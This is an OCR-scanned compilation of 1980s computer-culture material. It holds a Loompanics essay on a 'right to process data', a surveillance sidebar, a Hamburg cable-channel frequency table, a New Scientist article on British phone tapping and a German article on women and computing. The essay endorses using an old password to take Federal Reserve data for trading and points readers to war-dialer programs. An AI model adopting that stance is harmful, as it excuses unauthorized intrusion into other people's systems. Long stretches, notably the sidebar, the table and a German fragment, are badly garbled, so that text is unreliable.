have the word “microscopc” and even the Encyclo-
pedia Brittanica is woefuUy short on material about
the behavior of the hydroxyl ion’s valance electron
during cellular respiration. Nonetheless, a personal
Computer can be programmed to issue new
dictionaries where the key words (for molecules, or
stock market issues, or bullet calibers) are constant
and the codes (number or letter groups) change
frequently.
Should anyone try to intercept or monitor these
Communications, it could take years, if not decades,
to unscramble the encoded messages and it could
run into millions of dollars. Consider that there are
still battlefield ciphers from World War II that have
never been decrypted. Üt is no longer worth the
effort. These ciphers succeeded in their purpose to
hold secure a transmission.
Realize that your right to process data means
more than just encrypting your mailing lists. Since
your tax money pays for the collection of govem-
ment data, you have a right to that Information. If
you own stock in a Corporation, you have a right to
the information created or discovered by that Joint
stock Company. You have a right to any information
‘*Thefact is that freedom of the
press would be meaningless ifit
were limited to a narrow inter-
pretation such that the State
cannot sehe a printing press
without a court Order. Tele-
communications and desktop
Publishing are the active ex-
pressions of what Ben Franklin
had in mind 200 years ago. ”
which can adversely affect your life. It is a matter of
seif defense to know what Chemicals are put into the
water you drink and who puts them there.
Furthermore, you have a right to transmit what
you know. Yet there are government prosecutors
who Chase “pornographers” and reporters from
television stations by claiming that “freedom of the
STATErOF-THE^ARTSURVEILLANCE
Ustenng devkiM can M bdR bito the walls of th«
embassy. lipafTaiigeinentof Steel rekifordi« rods ' S«
orcon^ahapedcavhiesisMdden bl the Walls. vl
MIcrawaves are beamedat the Walls, and a b<
computerized recelver diff erentiates how the w
frequencyof themlcrowavesismodulatedby the ci
Impact of die volces on the
Steel rods and cavKIes.
Sowid and words cause vdndows bl the room to
vibrate. A laser beam is (Urected at the wlndow. The
beam Is reflected and pIcks IV the vibratlons of the
wfaidow. A Computer then reads the beam and
converts it back into sound.
press” is limited to those who own photo-offset
lithographic presses.
The fact is that freedom of the press would be
meaningless if it were limited to a narrow interpre-
tation such that the State cannot seize a printing
press without a court order. Telecommunications
and desktop Publishing are the active expressions of
what Ben Franklin had in mind 200 years ago.
What, after all, is a “newspaper?” Consider that the
Wall Street Journal is typeset electronically and
broadcast via satellitc to several printing plants
around the world. How is this different from a
homebrew buUetin board System? In Michigan’s
Capital City, The Lansing State Journal gets its state
government reporting from the Associated Press
wire Service. If they have a right to gather news
electronically, then so do you. You have every
reason to go beyond the narrow limits iraposed by
the powers that be.
“Auto-dialer” programs enable your Computer to
search for other data processing machines. The'
Computer Underground, written by M. Harry
(Loompanics, 1986) has a listing for an auto-dialer
program for Apple Computers. MegaSoft (PO Box
1080, Battle Ground, WA 98604) sells an “auto-
dialer” for Commodore Computers; the “War
Games Auto-Dialer” costs about $30.
In Order to realize the füllest possible bcnefits
from the Computer revolution, it is nccessary to
adopt an attitude which is open and expansive in
regard to data processing. A feudalist world of
ultra-secure Computers and data fortresses is
contrary to the spirit of data processing.
Every era has its ruling dass, and the nature of the
ruling dass is detcrmincd by the technology of the
era. Formerly, men on horses wearing armor mied.
Later it was pcoplc who could design and produce
industrial goods. Today peoplc who own or can use
electronic data processing equipraent are the new
ruling dass. Call them the “Datalords.”
In each age, the ruling dass tailors the law to suit
its own ends. Düring times of transition, the
^^^fo^ay~peopkyvho^vnorcM
use electronic data processing
eguipment are the new ruling
dass. Call them 'Datalords.
Innovators must fight against an established order
as they develop their own worldviews. The best
example in Western Civilization is the existence of
real estate laws. Land is called “real” estate because
you can’t put it on a horse and carry it out from
under the control of the king. It is called real "estate”
because title to it comes “ex-state,” i.e., from the
state. The king can grant titles; the king can revoke
titlcs.
The advent of capitalism brought about a legal
System that recognized the ownership of a drop-
forge without a deed certified by a governmental
unit or a title search performcd by a government
licensee.
The cybemetic revolution will require a legal
System which supports the view that while a
machine is still property in the capitalist sense, the
data in the machine is regulated by new laws that
better suit its nature.
Consider that silver and gold are “static**
Commodities. There is a fixed and known amount of
each on Earth and the materials are universally
useful to humans. Wheatandlumberare“dynamic’’
Commodities. The amount of each is determined by
the demand. Thedemand is universal and the supply
is limited by economic factors which control the
amount of land and human effort available to
produce wheat and lumber. No onc will refuse a free
loaf of bread. Data is a “fluid” commodity. It can be
produced in super-abundance. It can be copied.
Copying data does not destroy it. (There is no way
to copy gold or wheat.) Moreover, unlike bread and
gold, data is not universally useful.
In the Christian Bible, there is a story about a
shepherd boy named David who defeats a giant
named Goliath. At one point in the story, the king
offers David his royal armor to wear into battle. The
Bible teils of how the boy David trudgcs back and
forth, trying the burdensome metal plate. David
respectfully declines the offer, trusting in his god
to protect him. Now you know this cutc story.
you use the data?
“The cybemetic revolution will
require a legal System which
Supports the view that while a
machine is still property in the
capitalist sense, the data in the
machine is regulated by new
laws that better suit its nature. ”
On Thursday, October 9, 1986, Nissan Motors
over-the-puntcr stock was bid at while the
asking price was IYa. Can you use that information?
Consider the E.F. Hutton economist who in late
1982 relied on his old Federal Reserve System
Computer password to discover moncy supply
figures. The Fed announces these figures weekly and
the amount of paper in circulation has a direct effect
on intcrest ratcs. Knowing in advance what the
moncy supply would be announced to be, the man
from E.F. Hutton was able to trade profitably on
behalf of his employers. Time magazine for
January 13, 1983, called this “Filching Figures."
However, it is clear that nothing was “filched;" the
figures still rcsidcd in the machines. What the
government (and Time) objected to was the fact
that this individual didn’t wait for some lackey to
read the data from a cue card at a press Conference.
In his book Electronic Life, author and screen-
writer, Michael Crichton, states that it is inherent in
the technology of both computing and video to copy
and transfer information. Himself a big eamer of
Copyright royalties, Crichton says that the present
System is archaic. In his novel The Shockwave
Rider, John Brunner makes a case for opening all
government data flies.
There is a real good reason why selling stock in a
Company is called “going public.” Does your electric
Utility Company have a right to privacy that prevents
you from accessing and auditing its books? As a
stockholder in a major Corporation, don’t you have
a right to know about the Company? Why doesn’t
your local manufacturer release to you the Inform¬
ation they have already provided the U.S. Patent
Office or OSHA?
Similarly, your state’s wildlife department has
land-use data which can help you find a homestead
or a campsite or a ski-slope. The department of
transportation Computers can warn you in advance
of where holiday traffic accidents have occurred
over the last 10 ycars. The state treasury can show
you how much you, your employer or your neighbor
has paid in taxes.
Go out there and get that data!!
The Libertarian E-Mail Directory is available from
Dan Tobias, 4025 Golf Links BIvd Apt. 340,
Shreveport, LA 71109, for $3.00. It coniains the
personal names and datapath names for about 40
iibertarians using ARPA, CompuServe, Delphi,
Internet, and other electronic mail Systems.
aus: Loompanics Catalog '87
person who is employed at a
high’tech or unionized job can
afford the same level of Com¬
puter power enjoyed by corp-
oraüons and governments. We
are at a stage in history where
the average individual can be a
data Processing center. ”
A FINAL NOTE — In November of 1986, the Reagatt
adminstration launched a direct assault on your right to
process data. Then-security advisor John Poindexter said that
the government was seeking ways to limit access to PRIVA TE
DATA BASE SERVICES. This was echoed by Diane
Fountaine, a Dept. of Defense Speaker at a convention of the
Information Industry Association.
Poindexter said that the feds want to stop access to
information in the PUBLIC DOM AIS which they consider
“sensitive but unclassified." He targetted data on hazardbus
materials. Federal Reserve policy, social security and the
Securities Exchange Commission.
Founiaine's goals involve restricting access to public
database Services like Nexis, Dialog and Delphi. The Dept. of
Defense would have a law which requires database Services to
“red ßag“ individuals who ask too many questions about so-
called high tech subjecis like lasers; users who are “red
ßagged" would have their names turned over to the feds.
[Mil
Frequenzverteilung in BK-Hetz Haniburg Mitte
Kanal Bild
(O -
E02 s‘ 48.25
E03 ? 55.25
E04 62.25
_r> _
'S-
- o -
::: f :::::
___ _
a>
___ ^ -
o
-j -
-tS-
_JB _
SU-
-Qt)
--- Z
___ f
«T>
- y
-t>J
m
— - I
--Q
- a ^
S
S04 ^ 126.25
305 133.25
506 140.25
507 147.25
308 154.25
509 161.25
510 168.25
E05 175.25
E06 182.25
E07 189.25
EOS 196.25
E09 203.25
ElO 210.25
Eli 217.25
E12 224.25
511 231.25
512 238.25
513 245.25
514 252.25
515 259.25
516 266.25
517 273.25
518 280.25
519 287.25
520 294.25
Ton Empfang Sender
~ 43.00
52.75
o 60.75
%- 67.75
203.25
HH-Moorfleet
88.05
103.60
HH-Moorfleet
\ 88.80
95.30
Schwerin
5 ; 89.25
93.10
HH-Moorfleet
xr- 89.75
89.50
HH-Moorfleet
I- 90.65
98.50
Schwerin
^ 92.45
90.30
HH-Moorfleet
ni 94.00
92.20
HH-Mittelweg
5 94.75
87.60
HH-Moorfleet
0 95.70
99.20
HH-Moorf1eet
96.15
100.60
Rosengarten
PÖ 96.85
106.80
HH-Moorfleet
1. 97.35
95.00
HH-TV-Turm
o* 9 8.15
93.80
Bremen
99.65
97.10
HH-TV-Turm
^100.30
92.80
Schwerin
100.90
88.70
HH-Moorfleet
101.75
88.30
Bremen
T" 103.30
0.972
HH-Moorfleet
^104.25
102.90
Kaltenkirchen
^ 105.15
96.70
Bremen
ß 106.55
97.60
Visselhövede
J? 107.25
89.20
Schwerin
107.70
101.20
Bremen
131.75
138.75
145.75
152.75
159.75
166.75
535.25
Schwerin
173.75
217.25
Schwerin
X 0 u . f
±0 / . / 0
194.75
623.25
HH-TV-Turm
201.75
543.25
HH-TV-Turm
^Uö, /D
215.75
11500
EUT 1 -Fl
222.75
10970
INT VA-F12
229.75
11080
EUT 1-Fl
236.75
11550
INT VA-F12
243.75
11170
INT VA-F12
250.75
11130
INT VA-F12
257.75
11650
EUT 1-Fl
264.75
11670
EUT 1-Fl
271.75
11470
EUT 1-Fl
278.75
11010
INT VA-F12
Frogr an'.r.
DBP-intern
ARD (NDR-HH)
Kabelpilot
Radio Hamburg
Stimme der DDR
NDR 1 - Radio Niedersac
NDR 1 - Welle Nord
Berliner Rundfunk
NDR 1 - Hamburg Welle
NDR 4 - Gastarbeiter
NDR 2
NDR 3
Radio FFN
Radio 107
OK Radio
Radio Bremen 1
Radio KORAH
Radio DDR 2
DDF
Radio Bremen 2
NDR MW
RSH
Radio Bremen 3
BFBS
Radio DDR 1
Radio Bremen 4
DDR 2
DDR 1
Testbild
Testbild
NDR 3
ZDF
DBF Info
SAT 1
3 SAT
RTL plus
Eins plus
Bayern 3
musicbox
SKY Channel
SUPER Channel
TV 5 / Worldnet
WDR 3
Kabelpilot
Kabelpilot
Eureka
299.75
11600
INT VA-F12
A whisper down the line
Barry Fox with a user’s guide tokphone tapping
E VERYONE has at some time or
other been “sure” that their tele-
phone is bugged. UsuaUy it is not.
Clicks and crackles on the line can be
caused by dirty contacts at the local
exchange, or a crossed line. British Telecom
has never pretended that the telephone is a
secure instrument. A friend of mine once
got a crossed line into Buckingham Palace.
In September 1974, when I was writing
an article about letter bombs, 1 talked by
phone with an editor äbout a potentially
explosive weedkiller on open sale at,my
local Boots. Two hours later, the hrainch
manager got a phone call from his head
Office telling him to remove it at once.
Coinddence? Who cares. If tapping my
phone helped the police to stop the
bombers, more power to their plugs. What
grates, however, is the hypocrisy.
In 1985, after a slap-down by the Euro¬
pean Court of Human Rights, the British
govemment gave some figures on official
phone taps. Düring 1984, the Home
Secretary authorised 352 taps, the Foreign
Secretary 115 and the Secretary of State for
Scotland 71. Heaven knows how many
lines were being tapped without anyone’s
knowledge.
The Interception of Communications
Act 1985 came into force last April with the
promise of curbing such abuses. It merely
confirms that only a secretary of state,
usually in the Home Office, can authorise a
tap to prevent crime, benefit national Secu¬
rity or safeguard the economic wellbeing of
the countiy. Anyone eise gets a £2000 fine,
two years in jail or both—provided they are
cau^t and brought to book.
A panel of independent lawyers, sitting
as the Interception of Communications
Tribunal, investigates complaints. The ►
► govemment now refuses to give figures
on even official tapping and the tribunal
says it has not yet decided which complaint
statistics to release, or when or how, or even
i/it will release them. After 10 April this
year, the tribunal will no longer be able to
use the current excuse that it has not yet
been in business for a full year.
If the tribunal finds that a tap has been
properly authorised it simply teils the
complainant that “There has been no
contravention of the Act.” It says the same
thing if no tap is found. So the complainant
gets the same answer under two, radically
different, drcumstances—^and has no idea
how and where the tribunal looked.
Experts in paranoia will teil you how
lines can be tapped by clever technical
tricks. The fadlity TKO (TrunK Offering)
can tag trunk calls with an inaudible code
and break into an existing Connection. But
the easy way is at a local exchange. Essen-
tially, all it needs is an extra pair of wires
connected between the subscriber’s line
and a telephone earpiece or tape recorder.
The Connection is made by engineers at
the exchange, working in a reservcd area to
which most employees of British Telecom
have no access. The tapped subscriber
is unlikely to know, until something
happens—such as weedkiller disappearing
from a shop shelf.
The main bar to tapping is time.
Twenty years ago, the Hollywood film The
PresidenTs Analyst neatly summed up the
Problem. It conjured up the vision of a
United States in which every phone was
tapped, with only robots left with the time
to listen. Modem technology offers a solu-
tion similar to this. Speech-recognition
circuitry listens for key words or
accents—such as the word “bomb” in an
CAN YOO SPfAK*
uf iVEqoT fi n
feflO TAP
M. tr hr i cht Mr . : ,'v
Mfiicliricht-. vonr, l'M 11 -I-IMKLM;
bcd r-t (■ (+■:
f itTCies.di 1(11; Hin:
l ruf.' l' :
I c .; l.:
VM'.;! bif-.U-l- I Mf MHEhl Zi.lM KAÜIiL
ULU'.
Aui.M uf'iMn c-ju:m i.ahel- rrjü'iytutN rxNANiiiEKEN
(itr:? iic'nL'-cl'iC! linndr-'-.p,:..-, f in .’.t,t3.Ti«i(ii<?ri.7»r-bci t. mit ZDF
.Ml UcMiliCMotulf’. nacrli Dt + i n i el ) t?n AnqitbM’n ries Z!>F ,
d'itih rliri "Wi irf-t.-li I t 1 in" - i nn 733575 Anr-u-f»? t?r ha 11 tsn, d.h.
Dl-I
uif?nc'r(i(tu?n -
l.t; 'r 1 . c-1 l 1 (-• lii.M-iM iri, rjTtf5.E5 di»? gHPchftl Lf?i F.ungen
nichi ^iU53rni chtE-n und diese? daher am naechsten Wochenende,
natuor :i i c:h nur* rum Beriten der Zuschauer, vc?rdappel t wereJesn.
Wipi limr ini t. --
Nr,. IJ.'chri rht.
von: h’. lli:iNWE.CKt; cuns Ul—07-BA.
l'-:; i int -f i m nr (f'nd ^ n<? dr(?i vi or te.l Ni I 1 i on Zumchisuer
oni , cjurcli citirnti? bei ni d i t-y 1-c'S'F qewj nn versprechenden
Ihh-l TMiifJuli.'r Fjni'^t^hei rjend ,nu+ das Programm Ein-fluss
nr'liMir-i i r u Foonrif'-n .
rnr-u i ‘d qiil ( nnr din !-i n-mr i nrt.tng ;!ul;uer-ift j ge- KcibPlplAPne
erb j(^rDrhäl t V libff -liUS l’KjhfiNöbbl ne tz er. dt.irch die geplanten l^onifriorc i p j ] i.-.n
Irish brogue—and then switches on a tape
recorder. But someone somewhere still has
to listen to the tapes.
Recently, Llin Golding, the MP for
Newcastle under Lyme, had good reason to
fear that her phone was tapped. The phone
rang and her office heard someone at the
other end talking about “going off duty”.
Later, the phone replayed a conversation
she had had previously. It is unlikely that
this was the result of an official tap. The last
thing a Professional eave^ropper wants to
do is to inject damning signads back down
the line, whether from a microphone or
tape recorder.
Any business can quite legally buy or hire
equipment to log telephone calls, such as a
device called Tiger. This prints out a record
of every call made through the Company
switchboard. Primarily intended to deter
Office Staff from phoning their friends long
distance, the System can also nail leaks
of industrial Information. When one
Northern university installed a Tiger,
sevcral laboratory researchers had to buy
wristwatches. They had previously relied
on the speaking clpck.
Employees of British Telecom are bound
by the Official Secrets Act and the Tele-
communications Act. Few would dare to
tilg an unauthorised tap. But if a Company
boss wants to behave like an inquisitive
switchboard operator, and listen into staff
phone calls, then there is probably no legal
bar—just as the law cannot prevent a father
from picking up the extension phone and
monitoring a child’s call.
Brokers in the City are currently wonder-
ing how investigators may have coUcctcd
evidence of insider trading. To net one
incriminating conversation, it may
necessary to eavesdrop on many. Others in
the City are wondering what they may have
said on the telephone while British Tele¬
com was investigating a possible fraud
involving the billing of foreign calls.
TTie future will feed paranoia. There are
around 6000 telephone exchanges in
Britain. Until recently, all used primitive
mechanical relays to switch analogue
Signals. Now, every working day British
Telecom converts another of these
exchanges to System X or similar digital
technology. There are already more than
300 digital exchanges with solid-state
Switching, designed to create Conference
calls, re-route Imes and log numbers. The
origin and destination of any call can be
displayed on a Computer screen.
This is good news for the police, who will
be able to trace a kidnap call within
seconds. It is also good news for authorised
tappers. The tappers’ extra Connections are
inaudible, and even harder to detect than
previously.
But there will still remain one sure way of
finding out whether a phoiie is tapi^d. Just
put a simple fault on the line, for instance
by disconnecting a wire, and call BT’s
engineers using another phone. If they
arrive within minutes rather than days, be
on your guard. If someone really is tapping
your phone, they’ll want to get it working
again quickly. □
rogrAm
Al
cd: H(:'+-i l 1 ;i ch ncM:!"' Wun?;r;h f j 1 «.c* und Hi Uparaden?
Nsvv Sdentlst 26 Fabruary 1987
cj j 1»t ' ‘=1 ri i
lii WAhion
\ ^ /
Computer
- ein alter Herrenhut
Sich auskennen mit Computern ist eine Altersfrage,
ebenso ist es eine geschlechtsspezifische Frage
Computerheimarbeit / Computerlehrgang / Computerbuch
Von Maria Neef-Uthoff
ln einer Talkshow wurde die neue
Bildungsministerin von Schles¬
wig-Holstein, Eva Rühmkorf
(SPD), gefragt, was sie denn au¬
ßerhalb ihrer Regierungsge¬
schäfte noch machen würde. Sie
antwortete,, sie werde sich mit
Computern beschäftigen, das sei
ein Gebiet, das ihr bisher ver¬
schlossen geblieben sei. Obwohl
sie Frauen immer ermutigt hätte,
sich mit High Tech anzufreunden.
Und der sozialdemokratische Re¬
gierungschef Björn Engholm ver¬
kündete auf der Hanno ver-Messe,
daß er nach der Wahl Cornpumr-
praktikant werden wolle. Nicht
nur mittelalterliche Politiker ent¬
decken plötzlich, daß sie mit der
Zeit nicht Schritt gehalten haben,
auch unsereins macht diese herbe
Entdeckung.
Mit sechs Männern und tunt
Frauen lernen wir auf einem „nor¬
malen PC“. Ein „PC“ ist ein Per¬
sonal-Computer, mit dem man
„anständig “arbeitenkann, imGe-
gensatzzudenHome-Computern,
die kleiner sind, was die Kapazität
angeht. Die Leute sind zwischen
25 und 45, die Frauen arbeitslos,
die Männer kleinere und mittlere
Meister und Angestellte.
FünfTagelanglernenwir etwas
über IHN. ER kennt nur richtig
oder falsch. Macht man was
falsch, rattert und piepst es, und
aufdemBildschirmweistERmich
streng zurecht; „UnzulässigerBe-
fehl. “ Das schüchtert mich ein.
ER hört andererseits nur auf
„Befehle“, „stirbt“, wenn der
„Saft“ fehlt und ist in der Lage, auf
Befehl „ sich etwas zu holen“. ER
ist hochempfindlich und verträgt
keine Wärme wie die männlichen
Hoden. „Byte“ ist das Wort für
Zeichen, und die Anzahl zeigt die
Kapazität des „Speichers an.
„Programme“ sind Anweisun¬
gen. Eine Anweisung ist das zur
Zeit gebräuchliche Betriebssy¬
stem MS-DOS, das von einer Dis¬
kette in den Computer reingetan
wird, damit er überhaupt was tut.
„BASIC“ ist eine Programmier¬
sprache für Anfänger. „LOGO“
ist die einfachste Sprache, die
auch ein Home-Computer ver¬
steht. Die Computersprache te-
steht meist aus einsilbigen Wör¬
tern, so fremd wie Science-fic¬
tion. ER versteht mich nur, wenn
ich das Richtige zur rechten Zeit
mache. Wenn ich etwas drücke,
was nicht ins Programm paßt,
macht ER nicht mit. ER ignoriert
mich. W ijr lernen eine Menge über
„Disketten“, was „formatieren“
ist (die Diskette so herzurichten,
daß sie speichern kann), und dann
machen wir ein Ubungspro-
gratnm. „Das hast du sehr gut ge¬
macht, Maria“, lobt mich der gute
PC. Oh, was fühle ich mich gut.
Wie eindeutig ER doch ist, unbe-
stechlichundwahrhaftig,total ob¬
jektiv!
Ganz so wie Claus Eurich es be¬
zogen auf die Computerkinder’
kritisch beschreibt, man erMre
Reaktionen nur vom apparativen
Gegenüber, die Reaktion des
Computers erscheine einem nicht
subjektiv verzerrt. „Die Eindeu¬
tigkeit der Computerlogik, die
Unbarmherzigkeit gegenüber
Fehlern lassen den Rechner
schnell zum Maßstab für Unbe¬
stechlichkeit und Wahrheit
werden.“
Ach, lassen wir diesen Nörgler,
just an dieser Stelle befällt mich
ein zartes Gefühl von Liebe für den
Rechner.
Wie schön es sein muß, immer
wieder gelobt zu werden. Eifrig
übe ich mit meinem Übungspro¬
gramm weiter.. Alle Kursteilneh¬
mer sind guter Dinge. Wie beein¬
flußbar wir sind, wie hörig dem
geschriebenen Wort gegenüber,
dem Gerät, das unsere Namen
kennt. Es ist alles ziemlich ein¬
fach . Ein Apparat, der mit mir re¬
det, fordert mich zu Höchstlei¬
stungen heraus. Irgendwas hat er,
und nachder Angst vor ihm kommt
jetzt wie bei einem ordentlichen
Therapeuten die Übertragung und
die Verliebtheit.
Manchmal aber sind Punkte
wichtig. Manchmal Doppel¬
punkte, ER diszipliniert mich.
Ohne Punkt tut ER nichts, auch
wenn ich noch so oft den richtigen
Befehl eintippe. ER tut auch
nichts, wenn ich einen Tippfehler
mache, nein, ER zwingt mich, or¬
dentlich und sorgfältig zu sein. So
lerne ich sogar endlich fehlerfrei
Schreibmaschine zu schreiben!
„Guten Morgen, Maria“, sagt
der Computer am nächsten Tag.
Liebevoll streichle ich seine zar¬
ten Tasten. Man braucht sie nur
ganz leicht zu berühren, das hat er
sehr gerne. Über die bösen Men¬
schen, die Computer-Viren her¬
steilen, lernen wir auch etwas,
Computer-Viren sind Pro¬
gramme, die andere Programme
stören,
„Huch, was ist das, es geht
nicht“, ruft Roland. „Wer stellt
die Software her“, fragt Silke,
Die Frauen stellen die grund¬
sätzlicheren Fragen, die Männer
fragen nieetwas.Und wenn unser
Computerlehrer die Antwort gibt
hört man aus sechs Kehlen tiefes'
zustimmendes Brununen und
Brubbeln, und die letzten Worte
werden verständnissinnig nach¬
gesagt. Dabei tun sie sich' so
schwer mit der Anwendung, sie
vertippen sich andauernd, wäh¬
rend meine N achbarin es blind wie
mit links macht.
Der amerikanische Computer¬
wissenschaftler Joseph Weizen
bäum berichtet in seinem Buch
„Die Macht der Computer und die
Ohnmacht der Vernunft“, daß
aus einem Sprachanaly'senpro'^
gramm „Eliza“ ein Therapiepr^
gramm namens „Doctor“ entwik-
kelt hat. Viele praktizierende
Psychiater waren begeistert. Wei¬
zenbaum stellte bestürzt fest, wie
schnell und wie intensiv Perso¬
nen, die sich mit „Doctor“ unter¬
hielten, eine emotionale Bezie¬
hung zum Computer entwickel¬
ten. Deutlich wird aber auch das
erschreckend Defizitäre in der
menschlichen Kommunikation
und die Gläubigkeit an die Ma¬
schine, nicht in ihrer üblichen
Funktion als Verlängerung, son¬
dern als besserer Ersatz.
Frauenmhen
Wer ist Ada Gräfin von Lovelace?
Gelebt hat sie von 1815 bis 1852,
und sie hat einen französischen
Artikel ins Englische übersetzt.
Dazu hat sie umfangreiche An¬
merkungen verfaßt. Inhalt ihrer
Übersetzungsarbeit war das Kon¬
zept einer „analytischen Ma¬
schine“ eines Herrn Charles Bab-
bage, einFraiizose. Die Maschine
vvar eine Rechenmaschine. Und
Gräfin von Lovelace hat diese Re¬
chenmaschine nicht nur beschrie¬
ben, sie hat sie auch benutzt und
sich Gedanken darüber gemacht.
Ihre „Anmerkungen“ sind näm¬
lich nichts anderes als detaillierte
Beschreibungen für die Benut¬
zung der Maschine. Ein frühes er-
stesJHandbuch zur Gomputerpro-
grammierung hat sie geschrieben.
Zum Beispiel diskutiert sie in ih¬
ren „Anmerkungen“ die Anwen¬
dung von Computern für musika¬
lische Kompositionen. Ihre Bio¬
grafie ist schillernd und nicht bis
ins Letzte hinein ergründbar.
Immerhin hat sie sich um die
„Software“ verdient gemacht,
also um denjenigen Teil der Com¬
putertechnik, der nicht .wfe die
„Hardware“ anfaßhar ist, dem At¬
mosphärischen eben, also auch
dem traditionell Weiblichen.
In einer Sammlung von Vorträ¬
gen und Berichten zur Tagung
„Naturwissenschaften und Tech¬
nik — doch Fräuensache“ (1986)
fragt sich eine Arbeitsgruppe, wie
frau denn am besten an Computer
gewöhnt werden könnte. Und sie
kommen darauf, daß Frauen sich
gern mit Textilien beschäftigen.
Frauen, die in einer Arbeits¬
gruppe stricken, wollen was
„Konkretes schaffen“. Frauen
lieben es, an Volkshochschulen
Textilkurse zu belegen, das seien
für Frauen bekannte Bereiche.
Und jetzt kommen die schlauen
Frauen auf die Idee, die Compu¬
tertechnik über Musterweberei an
die Frau zu bringen. Weil viele
Frauen eine Affinität zum Weben
hätten und weil hier zwei Fliegen
mit einer Klappe erwischt wür¬
den, nämlich die Nähe der Webe¬
rei zur Frauenarbeitsgeschichte
und die Auflösung der „typisch
weiblichen Technophobic“.
„In der Arbeitsgnippendiskus-
sion wurde besonders von den In-
formatikerinnen herausgestellt,
daß es sich bei der Entwicklung
der Musterpatrone um einen Pro¬
grammiervorgang handelt, daß
von hier aus deshalb ein Zugang
zur Software des Computers mög¬
lich ist.“ Also, für wie blöd halten
sie die Frauen eigentlich? Soll mir
klammheimlich und hintenrum
eine Technik beigeb rächt werden,
die sowieso schon längst meinen
Arbeitsplatz ausmacht? Sekretä¬
rinnen sind Spezialistinnen am
Computer, ohne es zu wissen, sagt
die Autorin von „GO STOP
RUN“, dem ersten Computer¬
lehrbuch für Frauen, Deborah L.
Brecker.
Aber wie sehr sind Frauen ei-
gendich von der Computerisic-
rung betroffen? Spielen tun Mäd¬
chen so gut wie überhaupt nicht
damit. In Computercamps findet
man schlaue kleine Jungs, aber
fast keine schlauen kleinen Mäd¬
chen. Das, was früher ge-
schlechtsspezifische Spiele wa¬
ren, streng nach lungen und Mäd¬
chen eingeteilt, findet jetzt in der
Computerwelt ihren Nieder¬
schlag, sie bleiben den Mädchen
verschlossen. Da Mädchen vor¬
wiegend mit Mädchen spielen,
fehlt derNachahmungseffekt. Sie
kennen keine, dieeinen Computer
zu Hause hat, auch Mutter hat bis¬
lang keinen. In der Klasse meiner
Tochter haben von elf Jungen acht
einen Computer zu Hause, von
den 14 Mädchen hat keine einen.
So hat sich hintenrum wieder ein¬
mal eine geschlechtsspezifische
Aufteilung des Tuns, Könnens
und Wissens ergeben, eines Wis¬
sens, das einen erheblichen Vor¬
sprung ermöglicht.
Computer, soll man sie nun ver¬
teufeln, soll man sie akzeptieren?
Ist es eine Technikverweigerung,
dieFraüen spitzeFinger am Com¬
puter machen läßt? Oder ist es nur
die Folge des Grundsatzes, den je¬
des Mädchen gelernt hat: Mäd¬
chen verstehen nichts von
Technik?
Bekannte Strukturen
Eine Untersuchung von 1986
zeigt, daß im Banken- und Versi¬
cherungsbereich sechs Prozent
der Arbeitnehmerinnen Compu¬
ter benutzen. In der öffentlichen
Verwaltungund im Handel sind es
zirka20bis25 Prozent, und insge¬
samt setzen 14 Prozent Computer
als Hilfsmittel für ihre Arbeit ein.
Eine Brigitte-Studie hat im Jahre
1987 die Einstellung zum Compu¬
ter erfragt, und dabei kam heraus,
daß 87 Prozent der befragten
Frauen die Computerentwicklung
kritischer als die befragten Män¬
ner sehen. Sie haben Angst, daß
sich der Kontakt mit den Kollegen
verringern könnte, daß Arbeits¬
plätze vernichtet werden könnten.
Es gibt Gesundheitsbelastungen
und es gibt die Kontrolle durch den
Computer. Wie oft Frauen von ih-
reni Computerarbeitsplatz Weg¬
gehen, wie oft sie telefonieren,
was sie für Nummern anwählen,
all das kann der Computer für den
Arbeitgeber ermitteln. Akkord¬
höchstleistung kann er durch ge¬
zielte Disziplinierungen erzwin¬
gen. Dennoch: Die prinzipielle
Anwendung steht nicht mehr zur
Disposition.
Wie aber nimmt ffau Einfluß
auf die Entwicklung, Gestaltung
und Anwendung neuer Technolo¬
gien? Frauenspezifische Compu¬
ter? Das ist so albern wie der Ver¬
such, Frauen den Computer über
das Textile nahezubringen. Den
Mädchen ist das oft einfach zu
blöde, ein kleines Männchen auf
dem Bildschirm hin- und herflit¬
zen zu lassen. Inzwischen werden
Schnupperkurse für Mädchen an¬
geboren, auch von Gewerk¬
schaftsseite wird vorsichtig Wei¬
terbildung betrieben. Es ist wie
übcrallmitderMacht: Wiederein¬
mal sollen Frauen, ümsiezuerrei-
chen, sich etwas zu eigen machen,
das dem män'nlichen Geist, der
männlichen Herangehensweise
entspricht. Die Struktur ist männ¬
lich, und Frauen haben sich anzu-
.passen. Sie müssen lernen, und
das geht nicht über die Nischen
und über die Verweigerung. Was
für eine Vielfachbelastung!
Heimarbeit
Die Computerheimarbeit ist wei¬
ter verbreitet als viele ahnen. In
der Druckindustrie sind es mehr
.als 2.000 Frauen, die zu Hause am
Computer arbeiten. Die Frauen,
so ermittelte eine Sozialfor¬
schungsgruppe in Dortmund, ar¬
beiten als Selbständige. Sie be¬
kommen einen Werkvertrag, sie
garantieren dem Betrieb eine mo¬
natliche Leistung, z.B. eine Mil-
geht den Damen
ein Licht auf?
lion Anschläge. In Flautezelten ist rn(
das ganz übel, weil es dann keine eii
Verträge gibt.
30 Frauen und 25 Männer wur-
den für einen Forschungsbericht
zur Computerheimarbeit befragt,
den das Deutsche Jugendinstimt qt
München (DJI) im vergangenen ^
Jahr veröffentlicht hat. Danach ei
sind die Computerheimarbeite- b;
rinnen sehr zufrieden. Auf die ^
Frage, ob sie eine Arbeit außer d:
Hause vorzögen, antwortete die G
Mehrheirmit Nein. Obwohl es zu F
Streß und Problemen kommt, b
VieleFrauenarbeitenjageradezu v
Hause, weil sie Familienarbeit "
miteinbeziehen. Esstelltsichdann ü
schnell heraus, daßdie Kinder stö¬
ren. Dann wird nachts gearbeitet j
oder streng zu den Zeiten, wo die ^
Gören außer Haus sind. Das Zu- ,
hausesein empfinden infolgedes- j
sen viele der Frauen als ambiva- ^
lent. So sehr ist keine daran ge- ]
wohnt sich abzugrenzen, und sich ,
ganz diszipliniert die Zeit einzu¬
teilen. Auch wenn ein Drittel der
Frauen sich Putzhilfen leistet, ist
immer noch genug im Haus zu tun.
Frauen ünd Männer haben bei
ComputerheimarbeitwenigerGe-
legenheit, Freunde zu sehen und
Freizeitgestaltung zu betreiben.
Bei den Frauen liegt es am zerris¬
senen Tag, und bei eiligen Aufträ¬
gen, die nicht vorhersehbar sind,
bei den Männern aber auch unter
Umständen an der Computerfas¬
zination. Ein Problem zwanghaft
lösen zu wollen, auch wenn es die
Gesundheit kostet. Männer in der
Familie stellen andererseits fest,
daß sie durch die Computerheim¬
